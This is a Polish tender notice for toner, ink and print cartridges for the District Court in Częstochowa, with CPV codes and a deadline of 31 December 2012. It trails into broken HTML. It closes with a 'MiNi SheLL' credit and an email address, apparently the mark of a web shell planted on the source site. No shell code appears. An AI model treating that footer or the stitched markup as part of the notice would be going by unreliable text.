1) Przedmiotem zamówienia są dostawy materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych do Sądu Okręgowego w Częstochowie.

2)    przedmiot zamówienia zgodnie ze Wspólnym Słownikiem Zamówień - kody CPV:
CPV - 22600000-6 - tusz
CPV - 30125110-5 - toner do drukarek laserowych/faksów
CPV - 30192113-6 - wkłady drukujące

3)   Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2.C. do SIWZ.

4)    Wykonawca zobowiązany będzie do dostarczania materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych - przedmiot zamówienia w zadaniu C - których parametry nie będą gorsze od parametrów oryginalnych materiałów, zalecanych przez producentów urządzeń, w których materiały te będą stosowane. Dotyczy to w szczególności takich parametrów jak: jakość wydruków i wydajność (maksymalna) oraz pełna kompatybilności z urządzeniami, w których są stosowane, zwłaszcza w zakresie prawidłowego funkcjonowania wskaźników zużycia tonera/kartridża oraz wskaźników ilości wydrukowanych stron. Na poświadczenie powyższych wymagań Wykonawca winien złożyć oświadczenie pisemne zawarte w załączniku nr 2.C.

5)    Zamawiający wymaga, aby dostarczony przedmiot zamówienia odpowiadał wymaganiom i parametrom opisanym w załączniku nr 2.C do SIWZ.

6) Zamawiający dopuszcza rozwiązania równoważne opisywanym w specyfikacji istotnych warunków zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.

2.	Wymagany termin wykonania zamówienia

1)	Termin wykonania zamówienia - od dnia podpisania umowy do wyczerpania ilości maksymalnych określonych w załaczniku nr 2.C, jednak nie dłużej niż do dnia 31 grudnia 2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.60.00.00-6, 30.11.25.11-0, 30.19.21.13-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com